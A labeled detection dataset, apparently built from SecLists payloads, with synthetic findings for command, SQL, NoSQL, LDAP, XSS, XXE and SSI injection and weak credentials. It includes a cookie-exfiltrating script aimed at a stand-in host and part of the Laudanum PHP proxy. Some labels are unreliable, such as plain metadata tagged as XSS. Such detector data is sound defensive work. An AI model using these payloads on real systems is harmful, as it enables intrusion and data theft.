[{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "${system(print(`echo%20ARCVVC;echo%20$((7%2B90));echo%20ARCVVC;echo%20ARCVVC`)%3B.%2522ARCVVC", "injection_type": "cmd"}}]} {"id": "seclists_00901", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %2527%0A%20str%3D%24%28echo%20XQQOAJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%0A%20str%3D%24%28echo%20XQQOAJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22", "injection_type": "cmd"}}]} {"id": "seclists_00902", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %2522%0A%20str%3D%24%28echo%20TNOFGN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%0A%20str%3D%24%28echo%20TNOFGN%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20", "injection_type": "cmd"}}]} {"id": "seclists_00903", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: ..\\", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "..\\", "injection_type": "cmd"}}]} {"id": "seclists_00904", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %7C%20%5B%209%20-ne%20%24%28echo%20KBOHVQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%209%20-ne%20%24%28echo%20KBOHVQ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_00905", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %2527%7C%20%5B%204%20-ne%20%24%28echo%20SBHMIY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%7C%20%5B%204%20-ne%20%24%28echo%20SBHMIY%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C", "injection_type": "cmd"}}]} {"id": "seclists_00906", "source": "seclists", "source_license": "MIT", "text": "<?php\nini_set('session.use_cookies', '0');\n/* *****************************************************************************\n***\n*** Laudanum Project\n*** A Collection of Injectable Files used during a Penetration Test\n***\n*** More information is available at:\n*** http://laudanum.secureideas.net\n*** laudanum@secureideas.net\n***\n*** Project Leads:\n*** Kevin Johnson <kjohnson@secureideas.net\n*** Tim Medin <tim@counterhack.com>\n***\n*** Copyright 2014 by Kevin Johnson and the Laudanum Team\n***\n********************************************************************************\n***\n*** This file acts as a browser-based proxy.\n*** Written by Tim Medin <tim@counterhack.com>\n***\n********************************************************************************\n*** This program is free software; you can redistribute it and/or\n*** modify it under the terms of the GNU General Public License\n*** as published by the Free Software Foundation; either version 2\n*** of the License, or (at your option) any later version.\n***\n*** This program is distributed in the hope that it will be useful,\n*** but WITHOUT ANY WARRANTY; without even the implied warranty of\n*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n*** GNU General Public License for more details.\n***\n*** You can get a copy of the GNU General Public License from this\n*** address: http://www.gnu.org/copyleft/gpl.html#SEC1\n*** You can also write to the Free Software Foundation, Inc., 59 Temple\n*** Place - Suite 330, Boston, MA 02111-1307, USA.\n***\n***************************************************************************** */\n\n// TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page\n// figure out how to reuse sessionid from the remote site\n\ninclude 'ipcheck.php';\n\n\n/* This error handler will turn all notices, warnings, and errors into fatal\n * errors, unless they have been suppressed with the @-operator. */\nfunction error_handler($errno, $errstr, $errfile, $errline, $errcontext) {\n /* The @-opertor (used with chdir() below) temporarely makes\n * error_reporting() return zero, and we don't want to die in that case.\n * We do note the error in the output, though. */\n if (error_reporting() == 0) {\n $_SESSION['output'] .= $errstr . \"\\n\";\n } else {\n die('<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\n \"http://www.w3.org/TR/html4/strict.dtd\">\n<html>\n<head>\n <title>Laudanum PHP Proxy</title>\n</head>\n<body>\n <h1>Fatal Error!</h1>\n <p><b>' . $errstr . '</b></p>\n <p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>\n\n <hr>\n <address>\n Copyright &copy; 2014, <a href=\"mailto:laudanum@secureideas.net\">Kevin Johnson</a> and the Laudanum team.<br/>\n Written by Tim Medin.<br/>\n Get the latest version at <a href=\"http://laudanum.secureideas.net\">laudanum.secureideas.net</a>.\n </address>\n\n</body>\n</html>');\n }\n}\n\nset_error_handler('error_handler');\n\nfunction geturlarray($u) {\n // creates the url array, addes a scheme if it is missing and retries parsing\n $o = parse_url($u);\n if (!isset($o[\"scheme\"])) { $o = parse_url(\"http://\" . $u); }\n if (!isset($o[\"path\"])) { $o[\"path\"] = \"/\"; }\n return $o;\n}\n\nfunction buildurl ($u) {\n // build the url from the url array\n // this is used because the built in function isn't \n // avilable in all installs of php\n if (!isset($u[\"host\"])) { return null; }\n\n $s = isset($u[\"scheme\"]) ? $u[\"scheme\"] : \"http\";\n $s .= \"://\" . $u[\"host\"];\n $s .= isset($u[\"port\"]) ? \":\" . $u[\"port\"] : \"\";\n $s .= isset($u[\"path\"]) ? $u[\"path\"] : \"/\";\n $s .= isset($u[\"query\"]) ? \"?\" . $u[\"query\"] : \"\";\n $s .= isset($u[\"fragment\"]) ? \"#\" . $u[\"fragment\"] : \"\";\n return $s;\n}\n\nfunction buildurlpath ($u) {\n //gets the full url and attempts to remove the file at the end of the url\n // e.g. http://blah.com/dir/file.ext => http://blah.com/dir/\n if (!isset($u[\"host\"])) { return null; }\n\n $s = isset($u[\"scheme\"])? $u[\"s", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "proxy.php"}}]} {"id": "seclists_00907", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=\"%26echo%20XKUYPF$((60%2B61))$(echo%20XKUYPF)XKUYPF| HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"%26echo%20XKUYPF$((60%2B61))$(echo%20XKUYPF)XKUYPF|", "injection_type": "cmd"}}]} {"id": "seclists_00908", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%27&&echo%20QINFDZ$((25%2B98))$(echo%20QINFDZ)QINFDZ\\ HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27&&echo%20QINFDZ$((25%2B98))$(echo%20QINFDZ)QINFDZ\\", "injection_type": "cmd"}}]} {"id": "seclists_00909", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf <IMG SRC=`javascript:alert(\"'XSS'\")`>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<IMG SRC=`javascript:alert(\"'XSS'\")`>", "injection_type": "cmd"}}]} {"id": "seclists_00910", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf -20", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "-20", "injection_type": "cmd"}}]} {"id": "seclists_00911", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%7C%20%5B%206%20-ne%20%24%28echo%20PEFRRD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%206%20-ne%20%24%28echo%20PEFRRD%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_00912", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=1bitch\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "1bitch"}}]} {"id": "seclists_00913", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Extraneous Open Brackets</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Extraneous Open Brackets", "injection_type": "XSS"}}]} {"id": "seclists_00914", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">STYLE w/background-image</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "STYLE w/background-image", "injection_type": "XSS"}}]} {"id": "seclists_00915", "source": "seclists", "source_license": "MIT", "text": "# LDAP query log\nsearchFilter: admin*)((|userpassword=*)", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin*)((|userpassword=*)", "injection_type": "LDAP"}}]} {"id": "seclists_00916", "source": "seclists", "source_license": "MIT", "text": "filename=&#X00003c", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#X00003c", "injection_type": "cmd"}}]} {"id": "seclists_00917", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><body onkeydown=\"alert(1)\" contenteditable>test</body></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<body onkeydown=\"alert(1)\" contenteditable>test</body>", "injection_type": "XSS"}}]} {"id": "seclists_00918", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Osicom,d.e.b.u.g,User,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Osicom,d.e.b.u.g,User,"}}]} {"id": "seclists_00919", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:club@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "club"}}]} {"id": "seclists_00920", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<style>@keyframes x{}</style><pre style=\"animation-name:x\" onanimationstart=\"alert(1)\"></pre> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{}</style><pre style=\"animation-name:x\" onanimationstart=\"alert(1)\"></pre>", "injection_type": "XSS"}}]} {"id": "seclists_00921", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = admin' or '1'='1'/*", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin' or '1'='1'/*", "injection_type": "SQL"}}]} {"id": "seclists_00922", "source": "seclists", "source_license": "MIT", "text": "<?xml version=\"1.0\"?>\n<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>", "injection_type": "XXE"}}]} {"id": "seclists_00923", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%250a HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%250a", "injection_type": "cmd"}}]} {"id": "seclists_00924", "source": "seclists", "source_license": "MIT", "text": "<?xml version=\"1.0\"?>\n<!DOCTYPE xxe [<!ENTITY foo \"aaaaaa\">]>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<!DOCTYPE xxe [<!ENTITY foo \"aaaaaa\">]>", "injection_type": "XXE"}}]} {"id": "seclists_00925", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=gotyoass\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "gotyoass"}}]} {"id": "seclists_00926", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %0A/usr/bin/id", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A/usr/bin/id", "injection_type": "cmd"}}]} {"id": "seclists_00927", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:pornos@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "pornos"}}]} {"id": "seclists_00928", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \"%26%26echo%20NUMBRK$((29%2B87))$(echo%20NUMBRK)NUMBRK%27", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"%26%26echo%20NUMBRK$((29%2B87))$(echo%20NUMBRK)NUMBRK%27", "injection_type": "cmd"}}]} {"id": "seclists_00929", "source": "seclists", "source_license": "MIT", "text": "filename=\\00", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\00", "injection_type": "cmd"}}]} {"id": "seclists_00930", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><footer id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></footer></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><footer id=x style=\"position:absolute;\" onanimationcancel=\"alert(1)\"></footer>", "injection_type": "XSS"}}]} {"id": "seclists_00931", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<acronym id=x tabindex=1 onfocusin=alert(1)></acronym>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<acronym id=x tabindex=1 onfocusin=alert(1)></acronym>", "injection_type": "XSS"}}]} {"id": "seclists_00932", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf \"%26%26echo$IFSTXPRBJ$((40%2B83))$(echo$IFSTXPRBJ)TXPRBJ%27", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"%26%26echo$IFSTXPRBJ$((40%2B83))$(echo$IFSTXPRBJ)TXPRBJ%27", "injection_type": "cmd"}}]} {"id": "seclists_00933", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#echo var=\"gateway_interface\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#echo var=\"gateway_interface\" -->", "injection_type": "SSI"}}]} {"id": "seclists_00934", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf '&echo%20QFGFEP$((28%2B72))$(echo%20QFGFEP)QFGFEP%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'&echo%20QFGFEP$((28%2B72))$(echo%20QFGFEP)QFGFEP%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_00935", "source": "seclists", "source_license": "MIT", "text": "<?xml version=\"1.0\"?>\n<xml SRC=\"xsstest.xml\" ID=I></xml>", "findings": [{"category": "malicious", "subcategory": "malicious.xxe", "severity": "critical", "compliance": [], "fields": {"payload": "<xml SRC=\"xsstest.xml\" ID=I></xml>", "injection_type": "XXE"}}]} {"id": "seclists_00936", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p", "injection_type": "cmd"}}]} {"id": "seclists_00937", "source": "seclists", "source_license": "MIT", "text": "GET /search?q='-alert(1)-' HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'-alert(1)-'", "injection_type": "XSS"}}]} {"id": "seclists_00938", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: '; waitfor delay '0:30:0'--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'; waitfor delay '0:30:0'--", "injection_type": "cmd"}}]} {"id": "seclists_00939", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '\")) or sleep(__TIME__)=\"';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\")) or sleep(__TIME__)=\"", "injection_type": "SQL"}}]} {"id": "seclists_00940", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Intel,<BLANK>,shiva,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Intel,<BLANK>,shiva,"}}]} {"id": "seclists_00941", "source": "seclists", "source_license": "MIT", "text": "filename=%27%20echo%20NPYOVU$((6%2B61))$(echo%20NPYOVU)NPYOVU\\", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%20echo%20NPYOVU$((6%2B61))$(echo%20NPYOVU)NPYOVU\\", "injection_type": "cmd"}}]} {"id": "seclists_00942", "source": "seclists", "source_license": "MIT", "text": "filename=' or uid like '%", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or uid like '%", "injection_type": "cmd"}}]} {"id": "seclists_00943", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=&&echo%20TQHCUN$((6%2B71))$(echo%20TQHCUN)TQHCUN HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&&echo%20TQHCUN$((6%2B71))$(echo%20TQHCUN)TQHCUN", "injection_type": "cmd"}}]} {"id": "seclists_00944", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Name: META w/additional URL parameter HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: META w/additional URL parameter", "injection_type": "XSS"}}]} {"id": "seclists_00945", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><sub id=x tabindex=1 onbeforedeactivate=alert(1)></sub><input autofocus></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<sub id=x tabindex=1 onbeforedeactivate=alert(1)></sub><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_00946", "source": "seclists", "source_license": "MIT", "text": "filename=%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E", "injection_type": "cmd"}}]} {"id": "seclists_00947", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<video onloadstart=alert(1)><source>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<video onloadstart=alert(1)><source>", "injection_type": "XSS"}}]} {"id": "seclists_00948", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<x oncut=alert(1)>copy this!\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x oncut=alert(1)>copy this!", "injection_type": "XSS"}}]} {"id": "seclists_00949", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<param ondblclick=\"alert(1)\">test</param>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<param ondblclick=\"alert(1)\">test</param>", "injection_type": "XSS"}}]} {"id": "seclists_00950", "source": "seclists", "source_license": "MIT", "text": "password: strong\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "strong"}}]} {"id": "seclists_00951", "source": "seclists", "source_license": "MIT", "text": "filename=||echo$IFSCZXGHY$((46%2B9))$(echo$IFSCZXGHY)CZXGHY%26", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "||echo$IFSCZXGHY$((46%2B9))$(echo$IFSCZXGHY)CZXGHY%26", "injection_type": "cmd"}}]} {"id": "seclists_00952", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Author Name: xs-sniper HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: xs-sniper", "injection_type": "XSS"}}]} {"id": "seclists_00953", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Author Name: kishor\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: kishor", "injection_type": "XSS"}}]} {"id": "seclists_00954", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf \"<xml ID=\"\"xss\"\"><I><B><IMG SRC=\"\"javas<!-- -->cript:alert('XSS')\"\"></B></I></xml><SPAN DATASRC=\"\"#xss\"\" DATAFLD=\"\"B\"\" DATAFORMATAS=\"\"HTML\"\"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"<xml ID=\"\"xss\"\"><I><B><IMG SRC=\"\"javas<!-- -->cript:alert('XSS')\"\"></B></I></xml><SPAN DATASRC=\"\"#xss\"\" DATAFLD=\"\"B\"\" DATAFORMATAS=\"\"HTML\"\"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>\"", "injection_type": "cmd"}}]} {"id": "seclists_00955", "source": "seclists", "source_license": "MIT", "text": "filename=%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FAPCEG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FAPCEG%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C", "injection_type": "cmd"}}]} {"id": "seclists_00956", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<svg><details onload=alert(1)></details>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<svg><details onload=alert(1)></details>", "injection_type": "XSS"}}]} {"id": "seclists_00957", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 & HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &", "injection_type": "cmd"}}]} {"id": "seclists_00958", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%0A%20str%3D%24%28echo%20FXCZOR%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526", "injection_type": "cmd"}}]} {"id": "seclists_00959", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf |ls -la", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|ls -la", "injection_type": "cmd"}}]} {"id": "seclists_00960", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '' or ''*'';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "' or ''*'", "injection_type": "SQL"}}]} {"id": "seclists_00961", "source": "seclists", "source_license": "MIT", "text": "POST /api/login HTTP/1.1\nContent-Type: application/json\n\n, $where: '1 == 1'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ", $where: '1 == 1'", "injection_type": "NoSQL"}}]} {"id": "seclists_00962", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Description: Can be used when JS can be injected directly.</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: Can be used when JS can be injected directly.", "injection_type": "XSS"}}]} {"id": "seclists_00963", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=vincent\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "vincent"}}]} {"id": "seclists_00964", "source": "seclists", "source_license": "MIT", "text": "filename=%0A%20str%3D%24%28echo%20IXZJDX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20IXZJDX%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_00965", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\"> HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">", "injection_type": "cmd"}}]} {"id": "seclists_00966", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#exec cmd=\"/bin/ls /\" -->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": 